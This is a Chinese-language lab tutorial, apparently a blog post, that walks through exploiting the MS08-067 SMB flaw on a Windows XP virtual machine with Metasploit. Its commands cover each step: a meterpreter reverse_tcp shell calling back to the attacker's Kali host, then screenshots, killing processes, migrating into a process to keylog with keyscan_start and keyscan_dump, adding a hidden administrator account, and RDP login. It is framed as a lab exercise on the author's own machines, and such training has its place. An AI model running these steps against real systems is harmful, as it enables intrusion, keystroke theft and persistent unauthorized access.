本篇文章介绍关于msfconsole模块中ms08-067漏洞的一些实例应用。

实验背景:

    都是在虚拟机下进行的啦,靶机采用的是winxpens3,确保所用的靶机有相关的漏洞才能攻击成功哦。并且攻击机和靶机要处在同一局域网下才行哒,建议开启仅主机模式哦。还有一点,有些命令无效,可能是因为模式为普通用户模式,在命令前面使用sudo就好了,或者切换为root(su root)

实验环境:

攻击机:kali ip地址:192.168.127.139

靶机:winxpens3 ip地址:192.168.127.138

ms08-067的相关应用

1、配置命令

首先进入msfconsole界面,

1
search ms08-067      #查找ms08-067漏洞

可以看到这个漏洞的基本信息:

可以选择

1
use 0

或者使用如下命令,一样的意思

1
use exploit/windows/smb/ms08_067_netapi

选择之后,发现提示信息,按照提示信息配置:

1
set payload windows/meterpreter/reverse_tcp

然后输入

1
show options

查看哪些是yes,即必填,如果它的Current Setting为空,则要对它进行设置,如

1
2
3
set RHOSTS 192.168.127.138     #设置靶机地址

set LHOST 192.168.127.139 #设置攻击机地址

2、运行攻击

完成前面的配置之后,运行:

1
run       #或者使用exploit,来实现攻击

成功进入如下界面:

3、使用screenshot命令可对靶机界面进行截图:

1
screenshot

截图默认保存在/home/kali目录下(命令下面会显示文件保存的路径),进入文件路径可以看到截图。

4、查看并关闭靶机打开进程

可以先使用ps命令查看靶机打开的进程号

1
ps

然后可以使用kill关闭靶机的某个进程

比如,靶机此时打开了记事本,我在攻击上使用ps查看的进程号为2516(这个进程号是随机变化的哈),使用如下命令:

1
kill 2516

即可关闭通过攻击机关闭靶机的记事本进程

5、监听靶机键盘内容

同样先使用ps查看靶机此时的进程及进程号,得到此时靶机记事本进程为484(靶机已经重新打开记事本进程)

然后使用:

1
2
3
migrate 484        #484为靶机开启的进程号

keyscan_start #开启监听靶机键盘

然后在靶机上任意输一些内容,回到kali,然后输入以下命令,即可查看监听到的键盘内容

1
keyscan_dump       #得到监听内容

6、利用3389端口远程登录靶机

在Windows上创建一个名称为zt密码为pass的用户,并提升为管理员权限

1
2
3
net user zt pass /add                   #创建新用户,用户名为zt密码为pass

net localgroup Administrators zt /add #将用户加入Administrators组

确保靶机的3389端口已经打开,可以在kali上使用nmap扫描靶机地址查看靶机是否开启3389端口。

1
nmap -F 192.168.127.138            #查看靶机是否开启3389端口

发现3389端口已经打开,进入下一步。

接下来重新打开一个终端,输入

1
rdesktop 192.168.127.138      #远程登录靶机

回车后会自动弹出如图所示的登录窗口

使用创建的账户zt,密码pass即可远程登录靶机